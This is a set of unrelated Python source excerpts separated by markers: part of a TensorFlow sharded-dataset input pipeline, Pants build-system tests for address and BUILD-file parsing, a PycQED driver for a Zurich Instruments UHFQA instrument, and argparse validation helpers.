is_training=is_training,
num_threads=num_threads,
file_shuffle_size=len(file_names),
record_shuffle_size=record_shuffle_size)
# Split the dataset into `bsz_per_core` disjoint shards
shards = [dataset.shard(bsz_per_core, i) for i in range(bsz_per_core)]
# process each shard
process_shard = functools.partial(mass_process,
seq_len=seq_len,
num_predict=num_predict,
use_bfloat16=use_bfloat16)
shards = [process_shard(dataset=shard) for shard in shards]
# merge shards into a single batched dataset
def batch_zipped_dataset(*features):
"""Stack a list of homogeneous inputs from a zipped dataset into one."""
new_feature = {}
for key in features[0].keys():
tensor_list = [f[key] for f in features]
new_feature[key] = tf.stack(tensor_list, axis=0) # [sum bsz, length]
return new_feature
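  # Sketch of the zip+stack step below (toy shapes, added for clarity): if each of the
  # bsz_per_core shards yields {"inputs": [seq_len]}, zipping gives a tuple of
  # bsz_per_core dicts per step and batch_zipped_dataset stacks them into
  # {"inputs": [bsz_per_core, seq_len]}, i.e. the shard axis becomes the batch axis.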
dataset = tf.data.Dataset.zip(tuple(shards))
dataset = dataset.map(batch_zipped_dataset)
# Prefetch
dataset = dataset.prefetch(num_core_per_host)
return dataset
def get_input_fn(
doc_dir,
semi_dir,
sent_dir,
split,
uncased,
seq_len,
num_predict,
bsz_per_host,
num_hosts=1,
num_core_per_host=1,
use_bfloat16=False,
**kwargs):
"""Create Estimator input function."""
def dir_to_paths(data_dir, data_type):
"""Get data file paths in the given dir."""
file_paths = []
if data_dir:
tf.logging.info("=" * 120)
case_str = "uncased." if uncased else ""
glob_base = "data.{}.{}.{}tfrecord*".format(split, data_type, case_str)
for idx, dir_path in enumerate(data_dir.split(",")):
glob = os.path.join(dir_path, glob_base)
cur_file_paths = sorted(tf.io.gfile.glob(glob))
file_paths += cur_file_paths
tf.logging.info("[%d] Data glob: %s", idx, glob)
tf.logging.info("[%d] Num of file path: %d", idx, len(cur_file_paths))
| |
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import re
from textwrap import dedent
from typing import Iterable, cast
import pytest
from pants.base.exceptions import ResolveError
from pants.base.specs import (
AddressLiteralSpec,
AddressSpec,
AddressSpecs,
AscendantAddresses,
DescendantAddresses,
MaybeEmptySiblingAddresses,
SiblingAddresses,
)
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.engine.addresses import Address, Addresses, AddressInput, BuildFileAddress
from pants.engine.fs import DigestContents, FileContent, PathGlobs
from pants.engine.internals.build_files import (
AddressFamilyDir,
BuildFileOptions,
evaluate_preludes,
parse_address_family,
)
from pants.engine.internals.parametrize import Parametrize
from pants.engine.internals.parser import BuildFilePreludeSymbols, Parser
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.internals.target_adaptor import TargetAdaptor
from pants.engine.rules import Get, rule
from pants.engine.target import (
Dependencies,
GeneratedTargets,
GenerateTargetsRequest,
MultipleSourcesField,
SingleSourceField,
SourcesPaths,
SourcesPathsRequest,
StringField,
Tags,
Target,
TargetGenerator,
_generate_file_level_targets,
)
from pants.engine.unions import UnionMembership, UnionRule
from pants.testutil.rule_runner import (
MockGet,
QueryRule,
RuleRunner,
engine_error,
run_rule_with_mocks,
)
from pants.util.frozendict import FrozenDict
def test_parse_address_family_empty() -> None:
"""Test that parsing an empty BUILD file results in an empty AddressFamily."""
af = run_rule_with_mocks(
parse_address_family,
rule_args=[
Parser(build_root="", target_type_aliases=[], object_aliases=BuildFileAliases()),
BuildFileOptions(("BUILD",)),
BuildFilePreludeSymbols(FrozenDict()),
AddressFamilyDir("/dev/null"),
],
mock_gets=[
MockGet(
output_type=DigestContents,
input_type=PathGlobs,
mock=lambda _: DigestContents([FileContent(path="/dev/null/BUILD", content=b"")]),
),
],
)
assert len(af.name_to_target_adaptors) == 0
def run_prelude_parsing_rule(prelude_content: str) -> BuildFilePreludeSymbols:
symbols = run_rule_with_mocks(
evaluate_preludes,
rule_args=[BuildFileOptions((), prelude_globs=("prelude",))],
mock_gets=[
MockGet(
output_type=DigestContents,
input_type=PathGlobs,
mock=lambda _: DigestContents(
[FileContent(path="/dev/null/prelude", content=prelude_content.encode())]
),
),
],
)
return cast(BuildFilePreludeSymbols, symbols)
def test_prelude_parsing_good() -> None:
result = run_prelude_parsing_rule("def foo(): return 1")
assert result.symbols["foo"]() == 1
def test_prelude_parsing_syntax_error() -> None:
with pytest.raises(
Exception, match="Error parsing prelude file /dev/null/prelude: name 'blah' is not defined"
):
run_prelude_parsing_rule("blah")
def test_prelude_parsing_illegal_import() -> None:
prelude_content = dedent(
"""\
import os
def make_target():
python_sources()
"""
)
with pytest.raises(
Exception,
match="Import used in /dev/null/prelude at line 1\\. Import statements are banned",
):
run_prelude_parsing_rule(prelude_content)
class ResolveField(StringField):
alias = "resolve"
class MockTgt(Target):
alias = "mock_tgt"
core_fields = (Dependencies, MultipleSourcesField, Tags, ResolveField)
class MockGeneratedTarget(Target):
alias = "generated"
core_fields = (
Dependencies,
ResolveField,
SingleSourceField,
Tags,
)
class MockTargetGenerator(TargetGenerator):
alias = "generator"
core_fields = (Dependencies, MultipleSourcesField, Tags)
copied_fields = (Tags,)
moved_fields = (ResolveField,)
class MockGenerateTargetsRequest(GenerateTargetsRequest):
generate_from = MockTargetGenerator
# TODO: This method duplicates the builtin `generate_file_targets`, with the exception that it
# intentionally generates both using file addresses and generated addresses. When we remove
# `use_generated_address_syntax=True`, we should remove this implementation and have
# `MockTargetGenerator` subclass `TargetFilesGenerator` instead.
@rule
async def generate_mock_generated_target(
request: MockGenerateTargetsRequest,
union_membership: UnionMembership,
) -> GeneratedTargets:
paths = await Get(SourcesPaths, SourcesPathsRequest(request.generator[MultipleSourcesField]))
# Generate using both "file address" and "generated target" syntax.
return GeneratedTargets(
request.generator,
[
*_generate_file_level_targets(
MockGeneratedTarget,
request.generator,
paths.files,
request.template_address,
request.template,
request.overrides,
union_membership,
add_dependencies_on_all_siblings=True,
use_generated_address_syntax=False,
).values(),
*_generate_file_level_targets(
MockGeneratedTarget,
request.generator,
paths.files,
request.template_address,
request.template,
request.overrides,
union_membership,
add_dependencies_on_all_siblings=True,
use_generated_address_syntax=True,
).values(),
],
)
def test_resolve_address() -> None:
rule_runner = RuleRunner(rules=[QueryRule(Address, (AddressInput,))])
rule_runner.write_files({"a/b/c.txt": "", "f.txt": ""})
def assert_is_expected(address_input: AddressInput, expected: Address) -> None:
assert rule_runner.request(Address, [address_input]) == expected
assert_is_expected(
AddressInput("a/b/c.txt"), Address("a/b", target_name=None, relative_file_path="c.txt")
)
assert_is_expected(
AddressInput("a/b"), Address("a/b", target_name=None, relative_file_path=None)
)
assert_is_expected(AddressInput("a/b", target_component="c"), Address("a/b", target_name="c"))
assert_is_expected(
AddressInput("a/b/c.txt", target_component="c"),
Address("a/b", relative_file_path="c.txt", target_name="c"),
)
# Top-level addresses will not have a path_component, unless they are a file address.
assert_is_expected(
AddressInput("f.txt", target_component="original"),
Address("", relative_file_path="f.txt", target_name="original"),
)
assert_is_expected(AddressInput("", target_component="t"), Address("", target_name="t"))
with pytest.raises(ExecutionError) as exc:
rule_runner.request(Address, [AddressInput("a/b/fake")])
assert "'a/b/fake' does not exist on disk" in str(exc.value)
@pytest.fixture
def target_adaptor_rule_runner() -> RuleRunner:
return RuleRunner(rules=[QueryRule(TargetAdaptor, (Address,))], target_types=[MockTgt])
def test_target_adaptor_parsed_correctly(target_adaptor_rule_runner: RuleRunner) -> None:
target_adaptor_rule_runner.write_files(
{
"helloworld/dir/BUILD": dedent(
"""\
mock_tgt(
fake_field=42,
dependencies=[
# Because we don't follow dependencies or even parse dependencies, this
# self-cycle should be fine.
":dir",
":sibling",
"helloworld/util",
"helloworld/util:tests",
],
build_file_dir=f"build file's dir is: {build_file_dir()}"
)
"""
)
}
)
addr = Address("helloworld/dir")
target_adaptor = target_adaptor_rule_runner.request(TargetAdaptor, [addr])
assert target_adaptor.name == "dir"
assert target_adaptor.type_alias == "mock_tgt"
assert target_adaptor.kwargs["dependencies"] == [
":dir",
":sibling",
"helloworld/util",
"helloworld/util:tests",
]
# NB: TargetAdaptors do not validate what fields are valid. The Target API should error
# when encountering this, but it's fine at this stage.
assert target_adaptor.kwargs["fake_field"] == 42
assert target_adaptor.kwargs["build_file_dir"] == "build file's dir is: helloworld/dir"
def test_target_adaptor_not_found(target_adaptor_rule_runner: RuleRunner) -> None:
with pytest.raises(ExecutionError) as exc:
target_adaptor_rule_runner.request(TargetAdaptor, [Address("helloworld")])
assert "Directory \\'helloworld\\' does not contain any BUILD files" in str(exc)
target_adaptor_rule_runner.write_files({"helloworld/BUILD": "mock_tgt(name='other_tgt')"})
expected_rx_str = re.escape(
"'helloworld' was not found in namespace 'helloworld'. Did you mean one of:\n :other_tgt"
)
with pytest.raises(ExecutionError, match=expected_rx_str):
target_adaptor_rule_runner.request(TargetAdaptor, [Address("helloworld")])
def test_build_file_address() -> None:
rule_runner = RuleRunner(
rules=[QueryRule(BuildFileAddress, (Address,))], target_types=[MockTgt]
)
rule_runner.write_files({"helloworld/BUILD.ext": "mock_tgt()"})
def assert_bfa_resolved(address: Address) -> None:
expected_bfa = BuildFileAddress(address, "helloworld/BUILD.ext")
bfa = rule_runner.request(BuildFileAddress, [address])
assert bfa == expected_bfa
assert_bfa_resolved(Address("helloworld"))
# Generated targets should use their target generator's BUILD file.
assert_bfa_resolved(Address("helloworld", generated_name="f.txt"))
assert_bfa_resolved(Address("helloworld", relative_file_path="f.txt"))
@pytest.fixture
def address_specs_rule_runner() -> RuleRunner:
return RuleRunner(
rules=[
generate_mock_generated_target,
UnionRule(GenerateTargetsRequest, MockGenerateTargetsRequest),
QueryRule(Addresses, [AddressSpecs]),
],
objects={"parametrize": Parametrize},
target_types=[MockTgt, MockGeneratedTarget, MockTargetGenerator],
)
def resolve_address_specs(
rule_runner: RuleRunner,
specs: Iterable[AddressSpec],
) -> set[Address]:
result = rule_runner.request(Addresses, [AddressSpecs(specs, filter_by_global_options=True)])
return set(result)
def test_address_specs_literals_vs_globs(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.write_files(
{
"demo/BUILD": dedent(
"""\
generator(sources=['**/*.txt'])
"""
),
"demo/f1.txt": "",
"demo/f2.txt": "",
"demo/subdir/f.txt": "",
"demo/subdir/f.another_ext": "",
"demo/subdir/BUILD": "mock_tgt(name='another_ext', sources=['f.another_ext'])",
"another_dir/BUILD": "mock_tgt(sources=[])",
}
)
def assert_resolved(spec: AddressSpec, expected: set[Address]) -> None:
result = resolve_address_specs(address_specs_rule_runner, [spec])
assert result == expected
# Literals should be "one-in, one-out".
assert_resolved(AddressLiteralSpec("demo"), {Address("demo")})
assert_resolved(
AddressLiteralSpec("demo/f1.txt"), {Address("demo", relative_file_path="f1.txt")}
)
assert_resolved(
AddressLiteralSpec("demo", None, "f1.txt"), {Address("demo", generated_name="f1.txt")}
)
assert_resolved(
AddressLiteralSpec("demo/subdir", "another_ext"),
{Address("demo/subdir", target_name="another_ext")},
)
assert_resolved(
# Match all targets that reside in `demo/`, either because explicitly declared there or
# generated into that dir. Note that this does not include `demo#subdir/f2.ext`, even
# though its target generator matches.
SiblingAddresses("demo"),
{
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
},
)
assert_resolved(
# Should include all generated targets that reside in `demo/subdir`, even though their
# target generator is in an ancestor.
SiblingAddresses("demo/subdir"),
{
Address("demo", relative_file_path="subdir/f.txt"),
Address("demo", generated_name="subdir/f.txt"),
Address("demo/subdir", target_name="another_ext"),
},
)
all_tgts_in_demo = {
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
Address("demo", relative_file_path="subdir/f.txt"),
Address("demo", generated_name="subdir/f.txt"),
Address("demo/subdir", target_name="another_ext"),
}
assert_resolved(DescendantAddresses("demo"), all_tgts_in_demo)
assert_resolved(AscendantAddresses("demo/subdir"), all_tgts_in_demo)
assert_resolved(
AscendantAddresses("demo"),
{
Address("demo"),
Address("demo", relative_file_path="f1.txt"),
Address("demo", generated_name="f1.txt"),
Address("demo", relative_file_path="f2.txt"),
Address("demo", generated_name="f2.txt"),
},
)
def test_address_specs_deduplication(address_specs_rule_runner: RuleRunner) -> None:
"""When multiple specs cover the same address, we should deduplicate to one single Address."""
address_specs_rule_runner.write_files(
{"demo/f.txt": "", "demo/BUILD": "generator(sources=['f.txt'])"}
)
specs = [
AddressLiteralSpec("demo"),
SiblingAddresses("demo"),
DescendantAddresses("demo"),
AscendantAddresses("demo"),
# We also include targets generated from `demo` to ensure that the final result has both
# the generator and its generated targets.
AddressLiteralSpec("demo", None, "f.txt"),
AddressLiteralSpec("demo/f.txt"),
]
assert resolve_address_specs(address_specs_rule_runner, specs) == {
Address("demo"),
Address("demo", generated_name="f.txt"),
Address("demo", relative_file_path="f.txt"),
}
def test_address_specs_filter_by_tag(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.set_options(["--tag=+integration"])
address_specs_rule_runner.write_files(
{
"demo/f.txt": "",
"demo/BUILD": dedent(
"""\
generator(name="a", sources=["f.txt"])
generator(name="b", sources=["f.txt"], tags=["integration"])
generator(name="c", sources=["f.txt"], tags=["ignore"])
"""
),
}
)
assert resolve_address_specs(address_specs_rule_runner, [SiblingAddresses("demo")]) == {
Address("demo", target_name="b"),
Address("demo", target_name="b", relative_file_path="f.txt"),
Address("demo", target_name="b", generated_name="f.txt"),
}
# The same filtering should work when given literal addresses, including generated targets and
# file addresses.
literals_result = resolve_address_specs(
address_specs_rule_runner,
[
AddressLiteralSpec("demo", "a"),
AddressLiteralSpec("demo", "b"),
AddressLiteralSpec("demo", "c"),
AddressLiteralSpec("demo/f.txt", "a"),
AddressLiteralSpec("demo/f.txt", "b"),
AddressLiteralSpec("demo", "a", "f.txt"),
AddressLiteralSpec("demo", "b", "f.txt"),
AddressLiteralSpec("demo", "c", "f.txt"),
],
)
assert literals_result == {
Address("demo", target_name="b"),
Address("demo", target_name="b", generated_name="f.txt"),
Address("demo", target_name="b", relative_file_path="f.txt"),
}
def test_address_specs_filter_by_exclude_pattern(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.set_options(["--exclude-target-regexp=exclude_me.*"])
address_specs_rule_runner.write_files(
{
"demo/f.txt": "",
"demo/BUILD": dedent(
"""\
generator(name="exclude_me", sources=["f.txt"])
generator(name="not_me", sources=["f.txt"])
"""
),
}
)
assert resolve_address_specs(address_specs_rule_runner, [SiblingAddresses("demo")]) == {
Address("demo", target_name="not_me"),
Address("demo", target_name="not_me", relative_file_path="f.txt"),
Address("demo", target_name="not_me", generated_name="f.txt"),
}
# The same filtering should work when given literal addresses, including generated targets and
# file addresses.
literals_result = resolve_address_specs(
address_specs_rule_runner,
[
AddressLiteralSpec("demo", "exclude_me"),
AddressLiteralSpec("demo", "not_me"),
AddressLiteralSpec("demo", "exclude_me", "f.txt"),
AddressLiteralSpec("demo", "not_me", "f.txt"),
AddressLiteralSpec("demo/f.txt", "exclude_me"),
AddressLiteralSpec("demo/f.txt", "not_me"),
],
)
assert literals_result == {
Address("demo", target_name="not_me"),
Address("demo", target_name="not_me", relative_file_path="f.txt"),
Address("demo", target_name="not_me", generated_name="f.txt"),
}
def test_address_specs_do_not_exist(address_specs_rule_runner: RuleRunner) -> None:
address_specs_rule_runner.write_files(
{"real/f.txt": "", "real/BUILD": "mock_tgt(sources=['f.txt'])", "empty/BUILD": "# empty"}
)
def assert_resolve_error(specs: Iterable[AddressSpec], *, expected: str) -> None:
with engine_error(contains=expected):
resolve_address_specs(address_specs_rule_runner, specs)
    # Literal addresses require the relevant BUILD file to exist and the target to be
    # resolvable.
assert_resolve_error(
[AddressLiteralSpec("fake", "tgt")], expected="'fake' does not exist on disk"
)
assert_resolve_error(
[AddressLiteralSpec("fake/f.txt", "tgt")],
expected="'fake/f.txt' does not exist on disk",
)
did_you_mean = ResolveError.did_you_mean(
bad_name="fake_tgt", known_names=["real"], namespace="real"
)
assert_resolve_error([AddressLiteralSpec("real", "fake_tgt")], expected=str(did_you_mean))
assert_resolve_error([AddressLiteralSpec("real/f.txt", "fake_tgt")], expected=str(did_you_mean))
# SiblingAddresses requires at least one match.
assert_resolve_error(
[SiblingAddresses("fake")],
expected="No targets found for the address glob `fake:`",
)
assert_resolve_error(
[SiblingAddresses("empty")], expected="No targets found for the address glob `empty:`"
)
# MaybeEmptySiblingAddresses does not require any matches.
assert not resolve_address_specs(
address_specs_rule_runner, [MaybeEmptySiblingAddresses("fake")]
)
assert not resolve_address_specs(
address_specs_rule_runner, [MaybeEmptySiblingAddresses("empty")]
)
# DescendantAddresses requires at least one match.
assert_resolve_error(
[DescendantAddresses("fake"), DescendantAddresses("empty")],
expected="No targets found for these address globs: ['empty::', 'fake::']",
)
# AscendantAddresses does not require any matches.
assert not resolve_address_specs(
address_specs_rule_runner, [AscendantAddresses("fake"), AscendantAddresses("empty")]
)
def | |
# pycqed/instrument_drivers/physical_instruments/ZurichInstruments/UHFQuantumController.py
"""
To do:
- split off application dependent code, as done for ZI_HDAWG8.py
Notes:
Changelog:
20190113 WJV
- started Changelog
- addressed many warnings identified by PyCharm
- started adding type annotations
- split of stuff into _add_node_pars()
- made some properties 'private'
20190219 WJV
    - tagged some dead code with FIXME.
20190219:
- made _array_to_combined_vector_string() a @staticmethod
20190417 WJV
- merged branch 'develop' into 'feature/cc', changes:
spec_mode_on
spec_mode_off
20190429 WJV
- merged branch 'QCC_testing' into 'feature/cc', changes:
load_default_settings(): awgs_0_dio_strobe_index changed from 31 (CCL) to 15 (QCC)
20190612 WJV
- merged branch 'QCC_testing' into 'feature/cc', changes:
adds awg_sequence_acquisition_and_DIO_RED_test()
20190618 WJV
- merged branch 'develop' into 'feature/cc', changes:
20190813 NH
- merged branch 'develop' into 'feature/ZIupdateDrivers'
- Updated driver to use new UHFQA nodes
- Updated to support dynamic waveform upload properly. The AWG is configured when start() is called and the
driver then chooses whether it is necessary to recompile the AWG program. The program will be recompiled
if waveform lengths have changed. Otherwise, if waveforms have been updated they will just be downloaded
directly to the instrument.
20200214 WJV
- removed unused parameter repetitions from _find_valid_delays()
- also removed parameter repetitions from calibrate_CC_dio_protocol()
- split off calibrate_dio_protocol() from calibrate_CC_dio_protocol() to allow standalone use
20200217 WJV
- moved DIO calibration helpers to their respective drivers
- we now implement new interface CalInterface
- removed self._dio_calibration_mask and added parameter dio_mask where appropriate
"""
import time
import logging
import inspect
import numpy as np
from typing import Tuple,List
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.ZI_base_instrument as zibase
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.UHFQA_core as uhf
import pycqed.instrument_drivers.library.DIO as DIO
from qcodes.utils import validators
from qcodes.utils.helpers import full_class
log = logging.getLogger(__name__)
##########################################################################
# Exceptions
##########################################################################
##########################################################################
# Class
##########################################################################
class UHFQC(uhf.UHFQA_core, DIO.CalInterface):
"""
This is the PycQED driver for the 1.8 Gsample/s UHFQA developed
by Zurich Instruments.
Requirements:
Installation instructions for Zurich Instrument Libraries.
1. install ziPython 3.5/3.6 ucs4 19.05 for 64bit Windows from
http://www.zhinst.com/downloads, https://people.zhinst.com/~niels/
2. upload the latest firmware to the UHFQA using the LabOne GUI
"""
# Constants definitions from "node_doc_UHFQA.json"
DIOS_0_MODE_MANUAL = 0 # "0": "Manual setting of the DIO output value.",
DIOS_0_MODE_AWG_SEQ = 1 # "1": "Enables setting of DIO output values by AWG sequencer commands.",
DIOS_0_MODE_AWG_WAV = 2 # "2": "Enables the output of AWG waveform data as digital pattern on the DIO connector." FIXME: LabOne says: "QA result"
# FIXME: comments in this file state: QuExpress thresholds on DIO (mode == 2)
DIOS_0_EXTCLK_50MHZ = 2 # FIXME: not in "node_doc_UHFQA.json"
AWGS_0_DIO_VALID_POLARITY_NONE = 0 # "0": "None: VALID bit is ignored.",
AWGS_0_DIO_VALID_POLARITY_HIGH = 1 # "1": "High: VALID bit must be logical high.",
AWGS_0_DIO_VALID_POLARITY_LOW = 2 # "2": "Low: VALID bit must be logical zero.",
AWGS_0_DIO_VALID_POLARITY_BOTH = 3 # "3": "Both: VALID bit may be logical high or zero."
##########################################################################
# 'public' functions: device control
##########################################################################
def __init__(self,
name,
device: str,
interface: str = 'USB',
address: str = '127.0.0.1',
port: int = 8004,
use_dio: bool = True,
nr_integration_channels: int = 10,
server: str = '',
**kw) -> None:
"""
Input arguments:
name: (str) name of the instrument
device (str) the name of the device e.g., "dev8008"
interface (str) the name of the interface to use ('1GbE' or 'USB')
address (str) the host where the ziDataServer is running (for compatibility)
port (int) the port to connect to for the ziDataServer (don't change)
use_dio (bool) assert to enable the DIO interface
nr_integration_channels (int) the number of integration channels to use (max 10)
server: (str) the host where the ziDataServer is running (if not '' then used instead of address)
"""
t0 = time.time()
self._use_dio = use_dio
# Used for extra DIO output to CC for debugging
self._diocws = None
# Holds the DIO calibration delay
self._dio_calibration_delay = 0
# Holds the number of configured cases
self._cases = None
super().__init__(name=name, device=device, interface=interface, address=address,
server=server, port=port, nr_integration_channels=nr_integration_channels,
**kw)
t1 = time.time()
log.info(f'{self.devname}: Initialized UHFQC in {t1 - t0:.3f}s')
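    # Hedged usage sketch (not part of the original driver): instantiating the
    # driver and loading defaults. The device name 'dev2271' and the interface
    # are placeholders that depend on the local setup.
    #
    #   uhfqc = UHFQC('uhfqc_0', device='dev2271', interface='1GbE',
    #                 server='localhost', nr_integration_channels=9)
    #   uhfqc.load_default_settings()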
##########################################################################
# 'public' overrides for UHFQA_core
##########################################################################
def load_default_settings(self, upload_sequence=True) -> None:
super().load_default_settings()
# Load an AWG program
if upload_sequence:
self.awg_sequence_acquisition()
# Configure the codeword protocol
if self._use_dio:
self.dios_0_mode(self.DIOS_0_MODE_AWG_WAV) # QuExpress thresholds on DIO (mode == 2), AWG control of DIO (mode == 1)
self.dios_0_drive(0x3) # Drive DIO bits 15 to 0
self.dios_0_extclk(self.DIOS_0_EXTCLK_50MHZ) # 50 MHz clocking of the DIO
self.awgs_0_dio_strobe_slope(0) # no edge, replaced by dios_0_extclk(2)
self.awgs_0_dio_strobe_index(15) # NB: 15 for QCC (was 31 for CCL). Irrelevant now we use 50 MHz clocking
self.awgs_0_dio_valid_polarity(2) # high polarity FIXME: does not match AWGS_0_DIO_VALID_POLARITY_HIGH
self.awgs_0_dio_valid_index(16)
# No rotation on the output of the weighted integration unit, i.e. take
# real part of result
for i in range(0, self._nr_integration_channels):
self.set('qas_0_rotations_{}'.format(i), 1.0 + 0.0j)
# remove offsets to weight function
self.set('qas_0_trans_offset_weightfunction_{}'.format(i), 0.0)
##########################################################################
# 'public' functions: generic AWG/waveform support
##########################################################################
def load_awg_program_from_file(self, filename) -> None:
"""
Loads an awg sequence onto the UHFQA from a text file.
File needs to obey formatting specified in the manual.
Only provided for backwards compatibility purposes.
"""
print(filename)
with open(filename, 'r') as awg_file:
self._awg_program[0] = awg_file.read()
self._awg_needs_configuration[0] = True
def _do_set_AWG_file(self, filename) -> None:
self.load_awg_program_from_file('UHFLI_AWG_sequences/'+filename)
def awg_file(self, filename) -> None:
"""Only provided for backwards compatibility purposes."""
self.load_awg_program_from_file(filename)
def awg_update_waveform(self, index, data) -> None:
raise NotImplementedError(
'Method not implemented! Please use the corresponding waveform parameters \'wave_chN_cwM\' to update waveforms!')
##########################################################################
# 'public' functions: DIO support
##########################################################################
def plot_dio(self, bits=range(32), line_length=64) -> None:
data = self.getv('awgs/0/dio/data')
zibase.plot_timing_diagram(data, bits, line_length)
##########################################################################
# 'public' functions: weight & matrix function helpers
##########################################################################
def prepare_SSB_weight_and_rotation(self, IF,
weight_function_I=0,
weight_function_Q=1,
rotation_angle=0,
length=4096 / 1.8e9,
scaling_factor=1) -> None:
# FIXME: merge conflict 20200918
#=======
# def check_errors(self, errors_to_ignore=None) -> None:
#>>>>>>> ee1ccf208faf635329ea2c979da5757ce4ce8e14
"""
        Sets default integration weights for SSB modulation. Beware: this does not
        load pulses or prepare the UHFQC program to do data acquisition.
"""
trace_length = 4096
tbase = np.arange(0, trace_length / 1.8e9, 1 / 1.8e9)
cosI = np.array(np.cos(2 * np.pi * IF * tbase + rotation_angle))
sinI = np.array(np.sin(2 * np.pi * IF * tbase + rotation_angle))
if length < 4096 / 1.8e9:
max_sample = int(length * 1.8e9)
# setting the samples beyond the length to 0
cosI[max_sample:] = 0
sinI[max_sample:] = 0
self.set('qas_0_integration_weights_{}_real'.format(weight_function_I),
np.array(cosI))
self.set('qas_0_integration_weights_{}_imag'.format(weight_function_I),
np.array(sinI))
self.set('qas_0_rotations_{}'.format(
weight_function_I), scaling_factor*(1.0 + 1.0j))
        if weight_function_Q is not None:
self.set('qas_0_integration_weights_{}_real'.format(weight_function_Q),
np.array(sinI))
self.set('qas_0_integration_weights_{}_imag'.format(weight_function_Q),
np.array(cosI))
self.set('qas_0_rotations_{}'.format(
weight_function_Q), scaling_factor*(1.0 - 1.0j))
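    # Hedged usage sketch (not part of the original driver): SSB weights for an
    # illustrative 50 MHz intermediate frequency on weight functions 0 and 1.
    #
    #   uhfqc.prepare_SSB_weight_and_rotation(IF=50e6, weight_function_I=0,
    #                                         weight_function_Q=1)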
def prepare_DSB_weight_and_rotation(self, IF, weight_function_I=0, weight_function_Q=1) -> None:
trace_length = 4096
tbase = np.arange(0, trace_length/1.8e9, 1/1.8e9)
cosI = np.array(np.cos(2 * np.pi*IF*tbase))
sinI = np.array(np.sin(2 * np.pi*IF*tbase))
self.set('qas_0_integration_weights_{}_real'.format(weight_function_I),
np.array(cosI))
self.set('qas_0_integration_weights_{}_real'.format(weight_function_Q),
np.array(sinI))
# the factor 2 is needed so that scaling matches SSB downconversion
self.set('qas_0_rotations_{}'.format(weight_function_I), 2.0 + 0.0j)
self.set('qas_0_rotations_{}'.format(weight_function_Q), 2.0 + 0.0j)
##########################################################################
# Overriding private ZI_base_instrument methods
##########################################################################
def _add_extra_parameters(self) -> None:
"""
We add a few additional custom parameters on top of the ones defined in the device files. These are:
AWG_file - allows the user to configure the AWG with a SeqC program from a specific file.
Provided only because the old version of the driver had this parameter. It is discouraged to use
it.
        wait_dly - a parameter that enables the user to set a delay in AWG clock cycles (4.44 ns) to be
applied between when the AWG starts playing the readout waveform, and when it triggers the
actual readout.
cases - a parameter that can be used to define which combination of readout waveforms to actually
download to the instrument. As the instrument has a limited amount of memory available, it is
not currently possible to store all 1024 possible combinations of readout waveforms that would
be required to address the maximum number of qubits supported by the instrument (10). Therefore,
the 'cases' mechanism is used to reduce that number to the combinations actually needed by
an experiment.
dio_calibration_delay - the delay that is programmed on the DIO lines as part of the DIO calibration
process in order for the instrument to reliably sample data from the CC. Can be used to detect
unexpected changes in timing of the entire system. The parameter can also be used to force a specific
delay to be used on the DIO although that is not generally recommended.
"""
super()._add_extra_parameters()
self.add_parameter(
'AWG_file',
set_cmd=self._do_set_AWG_file,
docstring='Configures the AWG with a SeqC program from a specific file. '
'Provided only for | |
# -*- coding: utf-8 -*-
"""
Module with tools functions used on classes.
"""
import os
import numpy as np
import xarray as xr
from copy import deepcopy
import psutil
import errno
import argparse
import ghalton as gh
# import matplotlib.pyplot as plt
# from matplotlib import cm
# from matplotlib import ticker
# from matplotlib.widgets import Slider, RadioButtons
support3d = True
try:
from mpl_toolkits.mplot3d import Axes3D
except ImportError:
support3d = False
#
# Functions to Arguments validations
#
def argsparsefraction(txt):
"""
Validate the txt argument as value between 0.0 and 1.0.
:param txt: argument is a float string between 0.0 and 1.0.
:return: float
"""
    msg = "Value should be a float between 0.0 and 1.0"
try:
value = float(txt)
if value < 0 or value > 1.0:
raise argparse.ArgumentTypeError(msg)
return value
except ValueError:
raise argparse.ArgumentTypeError(msg)
def argsparselist(txt):
"""
    Validate a comma-separated list argument.
    :param txt: argument with comma-separated strings.
    :return: list of stripped strings.
"""
txt = txt.split(',')
listarg = [i.strip() for i in txt]
return listarg
def argsparseintlist(txt):
"""
Validate the list of int arguments.
:param txt: argument with comma separated numbers.
:return: list of integer converted numbers.
"""
txt = txt.split(',')
listarg = [int(i) for i in txt]
return listarg
def argsparseinputlist(txt):
"""
Validate the single or multiple input names argument.
- Formats:
- Single: one input name string. Ex: native.
- Multiple: input names with sequential range numbers. Ex: native02:05
:param txt: argument of input name.
:return: list with a single input name or multiples separated input names.
"""
inputsets = []
if txt.count(':') == 0:
inputsets.append(txt)
elif txt.count(':') == 1:
ifinal = txt.split(':')[1]
if ifinal.isdecimal():
ifinal = int(ifinal)
iname = list(txt.split(':')[0])
iinit = ''
for i in iname[::-1]:
if not i.isdecimal():
break
iinit += iname.pop()
if len(iinit):
iname = ''.join(iname)
iinit = int(iinit[::-1])
inputsets = [iname + ('%02d' % i) for i in range(iinit,
ifinal + 1)]
else:
                msg = "Wrong composite inputset name syntax: \nParameter " \
                      "<initialnumber> not found. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. Ex: native_01:10"
raise argparse.ArgumentTypeError(msg)
else:
            msg = "\nWrong composite inputset name syntax: \nParameter " \
"<finalnumber> not found. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. Ex: native_01:10"
raise argparse.ArgumentTypeError(msg)
else:
        msg = "\nWrong composite inputset name syntax: \nYou should specify " \
"only two input sizes. <inputsetname>_" \
"[<initialnumber>:<finalnumber>]. \nEx: native_01:10"
raise argparse.ArgumentTypeError(msg)
return inputsets
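# Usage sketch for the validator above (illustrative input names):
#
#   argsparseinputlist("native")         # -> ['native']
#   argsparseinputlist("native_02:05")   # -> ['native_02', 'native_03',
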